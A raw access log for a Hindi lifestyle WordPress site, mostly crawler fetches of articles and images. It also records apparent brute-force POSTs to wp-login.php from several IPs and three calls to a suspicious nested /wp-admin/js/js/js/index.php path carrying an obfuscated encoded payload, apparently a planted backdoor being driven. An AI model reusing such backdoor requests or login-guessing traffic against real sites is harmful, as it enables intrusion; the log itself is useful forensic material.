47.128.43.6 - - [20/Oct/2025:09:04:27 -0400] "GET /wp-content/uploads/2016/03/Your-eating-habits-have-changed.jpg HTTP/2.0" 200 77885 "https://hindi.blushin.com/why-women-gain-weight-after-marriage/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.43.6 - - [20/Oct/2025:09:04:27 -0400] "GET /wp-content/uploads/2016/03/You-are-trying-out-new-recipes.jpg HTTP/2.0" 200 100372 "https://hindi.blushin.com/why-women-gain-weight-after-marriage/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.43.6 - - [20/Oct/2025:09:04:27 -0400] "GET /wp-content/uploads/2016/03/Your-activity-levels-decline.jpg HTTP/2.0" 200 71859 "https://hindi.blushin.com/why-women-gain-weight-after-marriage/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.43.6 - - [20/Oct/2025:09:04:27 -0400] "GET /wp-content/uploads/2016/03/women-weight-gane-wfter-marriage.jpg HTTP/2.0" 200 78858 "https://hindi.blushin.com/why-women-gain-weight-after-marriage/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.43.6 - - [20/Oct/2025:09:04:28 -0400] "GET /wp-content/uploads/2016/03/You-could-be-experiencing-hormonal-changes.jpg HTTP/2.0" 200 57764 "https://hindi.blushin.com/why-women-gain-weight-after-marriage/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.43.6 - - [20/Oct/2025:09:04:28 -0400] "GET /wp-content/uploads/2016/03/You-could-be-getting-lazy-about-yo.jpg HTTP/2.0" 200 75713 "https://hindi.blushin.com/why-women-gain-weight-after-marriage/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
206.189.18.26 - - [20/Oct/2025:09:04:30 -0400] "POST /wp-login.php HTTP/2.0" 200 7089 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.178.231.51 - - [20/Oct/2025:09:04:36 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.116.199.115 - - [20/Oct/2025:09:02:11 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936383933312p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936353333312q3936353461393765663137363535383934356432626637333661656162643432222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
47.128.53.43 - - [20/Oct/2025:09:04:37 -0400] "GET /reason-for-legs-numbness/ HTTP/2.0" 200 315574 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.53.43 - - [20/Oct/2025:09:04:38 -0400] "GET /wp-content/uploads/2016/03/%E0%A4%86%E0%A4%AA%E0%A4%A8%E0%A5%87-%E0%A4%95%E0%A4%88-%E0%A4%AC%E0%A4%BE%E0%A4%B0-%E0%A4%90%E0%A4%B8%E0%A4%BE-%E0%A4%85%E0%A4%A8%E0%A5%81%E0%A4%AD%E0%A4%B5-%E0%A4%95%E0%A4%BF%E0%A4%AF%E0%A4%BE-%E0%A4%B9%E0%A5%8B%E0%A4%97%E0%A4%BE.jpg HTTP/2.0" 200 50014 "https://hindi.blushin.com/reason-for-legs-numbness/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.53.43 - - [20/Oct/2025:09:04:38 -0400] "GET /wp-content/uploads/2016/03/%E0%A4%9C%E0%A4%AC-%E0%A4%95%E0%A4%AD%E0%A5%80-%E0%A4%AD%E0%A5%80-%E0%A4%95%E0%A4%BF%E0%A4%B8%E0%A5%80-%E0%A4%95%E0%A5%8B-%E0%A4%AA%E0%A5%88%E0%A4%B0-%E0%A4%B8%E0%A5%8B%E0%A4%A8%E0%A5%87-%E0%A4%95%E0%A5%80-%E0%A4%B8%E0%A4%AE%E0%A4%B8%E0%A5%8D%E0%A4%AF%E0%A4%BE-%E0%A4%B9%E0%A5%8B%E0%A4%A4%E0%A5%80.jpg HTTP/2.0" 200 79224 "https://hindi.blushin.com/reason-for-legs-numbness/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.53.43 - - [20/Oct/2025:09:04:39 -0400] "GET /wp-content/uploads/2016/03/%E0%A4%9C%E0%A4%AC-%E0%A4%B9%E0%A4%AE-%E0%A4%B2%E0%A4%82%E0%A4%AC%E0%A5%87-%E0%A4%B5%E0%A4%95%E0%A5%8D%E0%A4%A4-%E0%A4%A4%E0%A4%95-%E0%A4%85%E0%A4%AA%E0%A4%A8%E0%A5%87-%E0%A4%AA%E0%A5%88%E0%A4%B0-%E0%A4%AA%E0%A4%B0-%E0%A4%AA%E0%A5%88%E0%A4%B0-%E0%A4%B0%E0%A4%96%E0%A4%95%E0%A4%B0.jpg HTTP/2.0" 200 39962 "https://hindi.blushin.com/reason-for-legs-numbness/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
103.178.231.51 - - [20/Oct/2025:09:04:39 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.53.43 - - [20/Oct/2025:09:04:39 -0400] "GET /wp-content/uploads/2016/03/feet-fall-asleep-in-hindi-633x319.jpg HTTP/2.0" 200 89913 "https://hindi.blushin.com/reason-for-legs-numbness/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.53.43 - - [20/Oct/2025:09:04:39 -0400] "GET /wp-content/uploads/2016/03/%E0%A4%AF%E0%A4%B9-%E0%A4%A4%E0%A4%82%E0%A4%A4%E0%A5%8D%E0%A4%B0%E0%A4%BF%E0%A4%95%E0%A4%BE%E0%A4%8F%E0%A4%82-%E0%A4%95%E0%A5%8B%E0%A4%B6%E0%A5%80%E0%A4%AF-%E0%A4%AB%E0%A4%BE%E0%A4%87%E0%A4%AC%E0%A4%B0-%E0%A4%95%E0%A5%80-%E0%A4%AC%E0%A4%A8%E0%A5%80-%E0%A4%B9%E0%A5%8B%E0%A4%A4%E0%A5%80-%E0%A4%B9%E0%A5%88%E0%A4%82%E0%A5%A4.jpg HTTP/2.0" 200 181367 "https://hindi.blushin.com/reason-for-legs-numbness/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:04:44 -0400] "GET /tag/how-to-decorate-your-bedroom-beautiful-after-wedding HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:09:04:45 -0400] "GET /tag/how-to-decorate-your-bedroom-beautiful-after-wedding/ HTTP/2.0" 200 149832 "https://hindi.blushin.com/tag/how-to-decorate-your-bedroom-beautiful-after-wedding" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
47.128.23.100 - - [20/Oct/2025:09:04:48 -0400] "GET /menal-in-rajasthan-is-a-tourist-hub/ HTTP/2.0" 200 316160 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.23.100 - - [20/Oct/2025:09:04:50 -0400] "GET /wp-content/uploads/2016/04/%E0%A4%95%E0%A4%B9%E0%A4%BE%E0%A4%82-%E0%A4%94%E0%A4%B0-%E0%A4%95%E0%A5%88%E0%A4%B8%E0%A4%BE-%E0%A4%B9%E0%A5%88-%E0%A4%AE%E0%A5%87%E0%A4%A8%E0%A4%BE%E0%A4%B2.jpg HTTP/2.0" 200 102880 "https://hindi.blushin.com/menal-in-rajasthan-is-a-tourist-hub/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.23.100 - - [20/Oct/2025:09:04:50 -0400] "GET /wp-content/uploads/2016/04/%E0%A4%AE%E0%A5%87%E0%A4%A8%E0%A4%BE%E0%A4%B2-%E0%A4%95%E0%A5%87-%E0%A4%86%E0%A4%B8%E0%A4%AA%E0%A4%BE%E0%A4%B8.jpg HTTP/2.0" 200 105080 "https://hindi.blushin.com/menal-in-rajasthan-is-a-tourist-hub/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.23.100 - - [20/Oct/2025:09:04:50 -0400] "GET /wp-content/uploads/2016/04/%E0%A4%B5%E0%A4%B9%E0%A5%80-%E0%A4%A6%E0%A5%82%E0%A4%B8%E0%A4%B0%E0%A5%80-%E0%A4%94%E0%A4%B0.bmp HTTP/2.0" 200 751950 "https://hindi.blushin.com/menal-in-rajasthan-is-a-tourist-hub/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.23.100 - - [20/Oct/2025:09:04:50 -0400] "GET /wp-content/uploads/2016/04/Menal-in-Rajasthan.jpg HTTP/2.0" 200 104832 "https://hindi.blushin.com/menal-in-rajasthan-is-a-tourist-hub/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.23.100 - - [20/Oct/2025:09:04:50 -0400] "GET /wp-content/uploads/2016/04/%E0%A4%9C%E0%A4%BE%E0%A4%A8%E0%A4%95%E0%A4%BE%E0%A4%B0%E0%A5%80-%E0%A4%95%E0%A5%87-%E0%A4%B2%E0%A4%BF%E0%A4%8F.jpg HTTP/2.0" 200 101692 "https://hindi.blushin.com/menal-in-rajasthan-is-a-tourist-hub/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:04:50 -0400] "GET /homemade-skin-whitening-remedies HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:09:04:51 -0400] "GET /homemade-skin-whitening-remedies/ HTTP/2.0" 200 317110 "https://hindi.blushin.com/homemade-skin-whitening-remedies" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
103.133.214.209 - - [20/Oct/2025:09:04:55 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.133.214.209 - - [20/Oct/2025:09:04:56 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:04:57 -0400] "GET /tag/bollywood-real-life-married-couples HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:09:04:58 -0400] "GET /tag/bollywood-real-life-married-couples/ HTTP/2.0" 200 150187 "https://hindi.blushin.com/tag/bollywood-real-life-married-couples" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
5.9.16.93 - - [20/Oct/2025:09:04:59 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
5.9.16.93 - - [20/Oct/2025:09:05:00 -0400] "POST /wp-login.php HTTP/2.0" 200 7092 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.40.56 - - [20/Oct/2025:09:04:59 -0400] "GET /chana-daal-halwa-recipe/ HTTP/2.0" 200 307581 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.40.56 - - [20/Oct/2025:09:05:01 -0400] "GET /wp-content/uploads/2016/12/halwa.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/chana-daal-halwa-recipe/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
85.208.96.207 - - [20/Oct/2025:09:05:03 -0400] "GET /tag/latest-lipstick-shades-for-summer/ HTTP/2.0" 200 150037 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:09:05:04 -0400] "GET /tag/best-sunscreen-for-skin-cancer-patients/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:09:05:05 -0400] "GET /tag/best-sunscreen-for-skin-cancer-patients/feed/ HTTP/2.0" 200 17566 "https://hindi.blushin.com/tag/best-sunscreen-for-skin-cancer-patients/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
66.116.199.115 - - [20/Oct/2025:09:02:33 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936383935332p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936353335332q3663343738363031623038353532366230396265313964393230623733613065222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
47.128.120.49 - - [20/Oct/2025:09:05:10 -0400] "GET /health-benefits-of-copper-utensils/ HTTP/2.0" 200 314663 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:05:11 -0400] "GET /tag/pomegranate-benefits-in-hindi HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
47.128.120.49 - - [20/Oct/2025:09:05:12 -0400] "GET /wp-content/uploads/2016/03/ggg.jpg HTTP/2.0" 200 106270 "https://hindi.blushin.com/health-benefits-of-copper-utensils/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.120.49 - - [20/Oct/2025:09:05:12 -0400] "GET /wp-content/uploads/2016/03/bb.jpg HTTP/2.0" 200 181129 "https://hindi.blushin.com/health-benefits-of-copper-utensils/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.120.49 - - [20/Oct/2025:09:05:12 -0400] "GET /wp-content/uploads/2016/03/aaaaa.jpg HTTP/2.0" 200 143726 "https://hindi.blushin.com/health-benefits-of-copper-utensils/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.120.49 - - [20/Oct/2025:09:05:12 -0400] "GET /wp-content/uploads/2016/03/fff.jpg HTTP/2.0" 200 301405 "https://hindi.blushin.com/health-benefits-of-copper-utensils/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.120.49 - - [20/Oct/2025:09:05:13 -0400] "GET /wp-content/uploads/2016/03/vvvv.jpg HTTP/2.0" 200 71566 "https://hindi.blushin.com/health-benefits-of-copper-utensils/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.120.49 - - [20/Oct/2025:09:05:13 -0400] "GET /wp-content/uploads/2016/03/g.jpg HTTP/2.0" 200 74498 "https://hindi.blushin.com/health-benefits-of-copper-utensils/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.120.49 - - [20/Oct/2025:09:05:13 -0400] "GET /wp-content/uploads/2016/03/jj-2.jpg HTTP/2.0" 200 38757 "https://hindi.blushin.com/health-benefits-of-copper-utensils/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:05:12 -0400] "GET /tag/pomegranate-benefits-in-hindi/ HTTP/2.0" 200 149584 "https://hindi.blushin.com/tag/pomegranate-benefits-in-hindi" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:09:05:18 -0400] "GET /tag/reasons-why-couples-wear-their-engagement-rings/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
87.106.196.15 - - [20/Oct/2025:09:05:19 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:05:19 -0400] "GET /tag/reasons-why-couples-wear-their-engagement-rings/feed/ HTTP/2.0" 200 9306 "https://hindi.blushin.com/tag/reasons-why-couples-wear-their-engagement-rings/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
47.128.118.2 - - [20/Oct/2025:09:05:22 -0400] "GET /10-reasons-for-premature-wrinkles/ HTTP/2.0" 200 316777 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
87.106.196.15 - - [20/Oct/2025:09:05:23 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
47.128.118.2 - - [20/Oct/2025:09:05:24 -0400] "GET /wp-content/uploads/2016/06/10-reasons-for-premature-wrinkles1.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/10-reasons-for-premature-wrinkles/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.118.2 - - [20/Oct/2025:09:05:24 -0400] "GET /wp-content/uploads/2016/06/10-reasons-for-premature-wrinkles2.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/10-reasons-for-premature-wrinkles/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.118.2 - - [20/Oct/2025:09:05:24 -0400] "GET /wp-content/uploads/2016/06/10-reasons-for-premature-wrinkles3.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/10-reasons-for-premature-wrinkles/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.118.2 - - [20/Oct/2025:09:05:24 -0400] "GET /wp-content/uploads/2016/06/10-reasons-for-premature-wrinkles.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/10-reasons-for-premature-wrinkles/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.118.2 - - [20/Oct/2025:09:05:25 -0400] "GET /wp-content/uploads/2016/06/10-reasons-for-premature-wrinkles4.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/10-reasons-for-premature-wrinkles/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:05:26 -0400] "GET /tag/kajal HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
47.128.118.2 - - [20/Oct/2025:09:05:25 -0400] "GET /wp-content/uploads/2016/06/10-reasons-for-premature-wrinkles6.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/10-reasons-for-premature-wrinkles/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.118.2 - - [20/Oct/2025:09:05:25 -0400] "GET /wp-content/uploads/2016/06/10-reasons-for-premature-wrinkles5.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/10-reasons-for-premature-wrinkles/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:05:28 -0400] "GET /tag/kajal/ HTTP/2.0" 200 153821 "https://hindi.blushin.com/tag/kajal" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
85.208.96.205 - - [20/Oct/2025:09:05:28 -0400] "GET /tag/prevent-monsoon-hair-fall/ HTTP/2.0" 200 149671 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.116.199.115 - - [20/Oct/2025:09:03:02 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303936383938322p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936353338322q6631303431366437346438653030653237646637376433323365313530623432222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
47.128.127.209 - - [20/Oct/2025:09:05:33 -0400] "GET /medicinal-benefits-of-asafoetida/ HTTP/2.0" 200 316229 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.127.209 - - [20/Oct/2025:09:05:35 -0400] "GET /wp-content/uploads/2016/05/%E0%A4%89%E0%A4%9A%E0%A5%8D%E0%A4%9A-%E0%A4%B0%E0%A4%95%E0%A5%8D%E0%A4%A4%E0%A4%9A%E0%A4%BE%E0%A4%AA-%E0%A4%95%E0%A4%82%E0%A4%9F%E0%A5%8D%E0%A4%B0%E0%A5%8B%E0%A4%B2-%E0%A4%95%E0%A4%B0%E0%A4%A4%E0%A4%BE-%E0%A4%B9%E0%A5%88-.jpg HTTP/2.0" 200 51778 "https://hindi.blushin.com/medicinal-benefits-of-asafoetida/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.127.209 - - [20/Oct/2025:09:05:35 -0400] "GET /wp-content/uploads/2016/05/%E0%A4%B9%E0%A5%80%E0%A4%82%E0%A4%97-%E0%A4%8F%E0%A4%95-%E0%A4%90%E0%A4%B8%E0%A4%BE-%E0%A4%AA%E0%A4%A6%E0%A4%BE%E0%A4%B0%E0%A5%8D%E0%A4%A5.jpg HTTP/2.0" 200 109412 "https://hindi.blushin.com/medicinal-benefits-of-asafoetida/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.127.209 - - [20/Oct/2025:09:05:35 -0400] "GET /wp-content/uploads/2016/05/Wonderful-Benefits-Of-Asafoetida-On-Your-Health-And-Skin.jpg HTTP/2.0" 200 61521 "https://hindi.blushin.com/medicinal-benefits-of-asafoetida/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.127.209 - - [20/Oct/2025:09:05:35 -0400] "GET /wp-content/uploads/2016/05/%E0%A4%B6%E0%A5%81%E0%A4%97%E0%A4%B0-%E0%A4%95%E0%A5%87-%E0%A4%B2%E0%A4%BF%E0%A4%8F-%E0%A4%B2%E0%A4%BE%E0%A4%AD%E0%A4%95%E0%A4%BE%E0%A4%B0%E0%A5%80-%E2%80%93.jpg HTTP/2.0" 200 50215 "https://hindi.blushin.com/medicinal-benefits-of-asafoetida/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.127.209 - - [20/Oct/2025:09:05:35 -0400] "GET /wp-content/uploads/2016/05/%E0%A4%85%E0%A4%A8%E0%A5%8D%E0%A4%AF-%E0%A4%AB%E0%A4%BE%E0%A4%AF%E0%A4%A6%E0%A5%87-.jpg HTTP/2.0" 200 94381 "https://hindi.blushin.com/medicinal-benefits-of-asafoetida/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.127.209 - - [20/Oct/2025:09:05:35 -0400] "GET /wp-content/uploads/2016/05/%E0%A4%AA%E0%A5%87%E0%A4%9F-%E0%A4%95%E0%A5%87-%E0%A4%95%E0%A5%80%E0%A5%9C%E0%A5%87-%E0%A5%99%E0%A4%A4%E0%A5%8D%E0%A4%AE-%E0%A4%95%E0%A4%B0%E0%A4%A4%E0%A4%BE-%E0%A4%B9%E0%A5%88-.jpg HTTP/2.0" 404 164295 "https://hindi.blushin.com/medicinal-benefits-of-asafoetida/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:09:05:35 -0400] "GET /tag/subclinical-acne/feed HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.143 - - [20/Oct/2025:09:05:37 -0400] "GET /tag/subclinical-acne/feed/ HTTP/2.0" 200 10617 "https://hindi.blushin.com/tag/subclinical-acne/feed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
185.191.171.11 - - [20/Oct/2025:09:05:39 -0400] "GET /tag/how-to-use-lemon-juice/ HTTP/2.0" 200 149564 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.143 - - [20/Oct/2025:09:05:45 -0400] "GET /tag/thyroid-cyst-pictures HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
47.128.48.112 - - [20/Oct/2025:09:05:44 -0400] "GET /anti-ageing-makeup-tips/ HTTP/2.0" 200 315233 "-" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
